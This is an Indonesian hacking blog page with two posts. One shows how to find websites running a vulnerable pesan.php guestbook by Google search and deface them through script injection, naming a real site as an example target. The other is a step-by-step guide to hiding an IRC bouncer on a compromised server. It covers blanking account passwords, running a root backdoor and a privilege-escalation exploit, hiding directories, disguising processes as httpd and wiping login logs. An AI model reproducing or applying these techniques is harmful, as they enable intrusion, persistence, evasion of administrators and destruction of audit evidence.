Vulnerabilities pesan.php
Diposting 21 September 2005 di Hacking jam 16:29 → Baru satu orang yang komentar
- Buka www.google.co.id trus ketik allinurl:.org/pesan.php
- Kalo udah dapat target nya misal nya : http://policewives.org/pesan.php
trus liat Clik here to sign in message. Linknya http://policewives.org/pesan.php?op=add - Di kolom pesan inject dgn script :
- Kalo ada gambar nya berarti bisa dideface.
Kalo nggak ada gambarnya, yg ada hanya tulisan berarti nggak bisa dideface.
Jgn kecewa ! cari target yg lain. - Kalo ada gambar nya Selanjut nya kita inject lagi dgn script deface guestbook (Lihat tutorial deface guestbook).
- SELESAI !!!
→ Komentar yah
| Permalink |
Kecerobohan yang sering dilakukan dalam menginstall psyBNC
Diposting 18 September 2005 di Hacking jam 05:48 → 3 blogger komentar
Okelah…saya akan membeberkan beberapa kecerobohan yang sering kita lakukan ketika kita memasang PSYBNC di server target :
Menjalankan PSYBNC dengan login user yang kita add di shell target.
Ini adalah kecerobohan yang paling fatal yang seringkali kita lakukan. Kalau saya menjadi seorang Admin ketika saya akan mengecek system maka yang akan saya cek pertama kali teh adalah file /etc/passwd karena di file tersebutlah terdapat seluruh nama user yang bisa login ke system. Ketika saya menemukan ada nama user yang berbeda dengan nama user yang ada di file /etc/passwd yang sebelumnya saya backup maka bisa di pastikan bahwa ada user illegal yang baru saja masuk ke dalam system. Dan ketika saya menemukan kejanggalan ini maka saya akan langsung menghapus home direktori dari user tersebut dengan recursife mode yang berarti seluruh folder beserta isinya akan di hapus tanpa kompromi. Bisa di pastikan juga bahwa file PSYBNC Anda yang di simpan di folder tersebut akan ikut terhapus.
file yang asli?.
?.
nscd
:28:28:NSCD Daemon:/:/bin/false
ident:98:98
ident user:/:/sbin/nologin
radvd:75:75:radvd user:/:/bin/false
xnuxer:500:500::/home/budakbaonk:/bin/bash
isi file /etc/passwd yang telah termodifikasi?.
?.
nscd:28:28:NSCD Daemon:/:/bin/false
ident:98:98ident user:/:/sbin/nologin
radvd:75:75:radvd user:/:/bin/false
budakbaonk:500:500::/home/budakbaonk:/bin/bash
barudakbaonk:76:75::/etc/.budakbaonk:/bin/bash ? dari sini si Admin bisa menebak
Menyimpan file PSYBNC di folder yang tidak tersembunyi.
Bila kita melihat contoh kasus di point pertama di atas Anda seharusnya menyembunyikan folder psybnc dan merubah nama folder dengan nama lain sehingga ketika si Admin mengecek folder user dengan menggunakan command ls maka file Anda tidak akan terlihat.
Menjalankan PSYBNC dengan menggunakan nama file PSYBNC atau file konfig yang tidak di rename nama filenya.
Ketika si Admin sudah mencurigai bahwa systemnya telah di masuki orang lain maka bisa di pastikan si Admin akan mengecek file-file yang running di system dengan menggunakan perintah ps ?ax dan si Admin melihat ada process system yang menggunakan nama PSYBNC maka bisa di pastikan si Admin akan langsung menjalankan perintah killall psybnc dan semua file yang di run dengan nama tersebut langsung mati.
1058 tty3 S 0:00 /sbin/mingetty tty3
1059 tty4 S 0:00 /sbin/mingetty tty4
1060 tty5 S 0:00 /sbin/mingetty tty5
1061 tty6 S 0:00 /sbin/mingetty tty6
1064 tty1 S 0:00 -bash
1103 tty2 R 0:00 ./psybnc psybnc.conf
1124 tty1 R 0:00 ps -ax
Jadi gimana caranya ? Saya akan memberikan trik yang aman yang bisa Anda coba dan Anda kembangkan sendiri. Dengan melihat tiga kasus di atas maka ada beberapa cara untuk mengatasinya.
- Jangan membuat user login ke dalam file /etc/passwd ketika Anda mendapatkan akses root dengan menggunakan eksploit tapi manfaatkan user yang sudah ada di file tersebut dan user tersebut di pakai oleh system dengan menggunakan shell bash atau sh. Misalnya seperti: news, mysql, postgres, etc. Anda bisa memilih beberapa user system yang bisa di manfaatkan, kemudian hapus password dari user tersebut dengan menggunakan perintah passwd ?d [nama user] sehingga ketika Anda login dengan menggunakan nama user tersebut, password tidak akan di minta oleh system. Jika Anda login dengan menggunakan SSH yang sudah jalan di system hal ini tidak berlaku dan Anda tetap akan di mintai password kecuali jika Anda bisa mengakali SSH target dengan menggunakan beberapa trik (hehehe?. ).
contoh user yang bisa di pakai ?
rpm:37:37::/var/lib/rpm:/bin/bash
menghapus password rpm ?
sh-2.05# passwd -d rpm
Changing password for user rpm
Removing password for user rpm
passwd: Success
setelah password di hapus ?
bash$ su rpm
[rpm@serv /var/lib/rpm]$
- Jalankan beberapa backdoor di system yang bisa memberikan akses root tanpa harus merubah file /etc/passwd seperti di bawah ini:
bash# ./httpd
Password:
=- sia asup ka aRai PriVAte BaCkd00r #jambihackerlink -=
sh-2.05b$
sh-2.05b$
Step 1 – Checking paths and write permisions
Checking write permisions on /tmp…Ok
Checking read permisions on /bin/su…Ok
Checking that /tmp/LC_MESSAGES does not exist…Ok
Step 2 – Creating evil libc.mo and setting enviroment vars
Step 3 – Getting address of .dtors section of /bin/su
……………………………………done
.dtors is at 0×0804cd4c
Step 4 – Compiling suid shell
/tmp/.sh created Ok
Step 5 – Executing /bin/su
Step 6 – Set permission file…
Step 7 – Successfull…!
Run root shell with type /tmp/.sh, Enjoy bro ;P …!
bash# exit
bash$ /tmp/.sh
sh-2.05# id
uid=0(root) gid=0(root) groups=500(budakbaonk)
- Buat nama direktori tersembunyi dengan menggunkan akses root di lokasi yang sering di pakai oleh system seperti di direktori /etc, /var, dsb dengan menggunakan karakter ?.? (titik) di depan direktori yang akan kita buat ( .sh ). Caranya adalah sbb:
bash# mkdir /var/log/? ? Ini dia direktori yang tersembunyi hehehe?.
bash# chmod 700 /var/log/?
bash# chown budakbaonk:budakbaonk /var/log/?
budakbaonk adalah nama user yang sudah ada di /etc/passwd (tanpa merubah file tersebut) yang nanti akan di gunakan untuk menjalankan file psybnc.
- Gunakan nama user yang ada di file /etc/passwd yang bukan milik system untuk menjalankan file psybnc Anda dengan cara menghilangkan karakter ?x? setelah nama user. Jangan menggunakan perintah passwd ?d [nama user] untuk menghilangkan password user tersebut karena hal ini akan mengakibatkan kecurigaan user yang login dengan name login yang kita pakai ketika dia login dan tidak di mintakan password oleh system. Dengan menambahkan kembali karakter ?x? di user name yang kita hapus karakter ?x? ?nya, hal ini akan mengembalikan password user tersebut tanpa perlu proses yang rumit.
sebelum karakter ?x? di hapus ?
budakbaonk:500:500::/home/budakbaonk:/bin/bash
sesudah karakter ?x? di hapus ?
budakbaonk::500:500::/home/budakbaonk:/bin/bash
login dengan user yang karakter ?x? sudah di hapus ?
bash$ su budakbaonk
[budakbaonk@serv /home/budakbaonk]$
mengembalikan karakter ?x? yang di hapus ?
budakbaonk:500:500::/home/budakbaonk:/bin/bash
login dengan user yang karakter ?x? sudah di tulis kembali ?
bash$ su budakbaonk
password:
- Setelah Anda menghapusk karakter ?x? di /etc/passwd dengan menggunakan akses root selanjutnya login dengan nama user tersebut. Kemudian masukalh ke direktori tersembunyi yang telah kita buat seperti contoh di atas.
bash$ cd /var/log/?
simpan file psybnc Anda di direktori ini dan rename file psybnc Anda dengan nama lain misalnya ? atau .sh
bash$ mv psybnc .sh
ganti juga nama konfig psybnc dengan nama yang tidak di curigai
bash$ mv psybnc.conf httpd
jalankan psybnc.
bash$ ./httpd
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
| O || ,-’ / / | o || | || ,–’
| _/ _ / | o< | | || |__
|_| |____/ |__| |___||_| _| ___|
Version 2.3 (c) 1999-2001
the most psychoid
and the cool lam3rz Group IRCnet
Configuration File: httpd
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 3456
psyBNC2.3-cBtITLdDMSNp started (PID 379185)
so? hehehehe... sekarang Anda bisa memakai psybnc Anda.. dan ketika si Admin menjalankan perintah ps -ax maka akan terlihat proses seperti di bawah ini:
1060 tty5 S 0:00 /sbin/mingetty tty5
1061 tty6 S 0:00 /sbin/mingetty tty6
1064 tty1 S 0:00 -bash
1132 tty2 R 0:00 ./httpd
1136 tty1 R 0:00 ps -ax
- Keluarlah dari user login yang Anda pakai, kemudian dengan akses root tambahkan kembali karakter ?x? di user name yang Anda pakai tadi untuk mengembalikan password user yang Anda pakai.
mengembalikan karakter ?x? yang di hapus ?
budakbaonk:500:500::/home/budakbaonk:/bin/bash
login dengan user yang karakter ?x? sudah di tulis kembali ?
bash$ su xnuxer
password:
Demikian cara yang saya tawarkan kepada Anda yang bisa menjadikan pilihan bagi Anda untuk memperpanjang umur psybnc. Saya sarankan juga agar Anda menghapus log yang ada di system baik dengan program Log Remover atau program penghapus log yang lain.
sh-2.05# ./rem postgres
Log Remover by aRai #jambihackerlink
Step 1 – Check log…
Found 2 record(s) for user postgres
Step 2 – Cleaning Up….
Cleaning up 2 record(s) from /var/log/wtmp … OK
Cleaning up 2 record(s) from /var/run/utmp … OK
Cleaning up /var/log/lastlog … OK
Cleaning up /var/log/messages … OK
Cleaning up /var/log/secure … OK
Cleaning up /var/log/maillog … OK
Step 3 – Successfull Cleaning up…
Sekian trik dari saya, jika Anda ingin maju belajarlah untuk kreatif dan kuasai system Anda bukan system yang membuat Anda terkuasai, pelajari system so, Anda akan menemukan jawaban dari apa yang Anda cari selama ini.
Tapi ada cara yg lebih baik dah mudah … yaitu dengan memakai kik
kita tinggal kasih perintah ./kik /usr/sbin/httpd ./httpd
mudah kan? ~
Byeeeeeeeeeeeeee !!
Klik untuk Komentar | Permalink |
- aRai -
"If I die tomorrow...I'd be allright...Because I believe...That after were gone...The spirit carries on"
Masa Lalu adalah Sejarah. Masa Depan adalah Misteri ... Sekarang adalah Anugrah
